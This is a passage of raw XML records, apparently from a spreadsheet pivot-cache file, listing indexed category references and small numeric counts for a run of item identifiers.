    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="4"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="16"/>
    <x v="1380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="4"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="43"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="79"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="68"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="29"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1386"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1387"/>
  </r>
  <r>
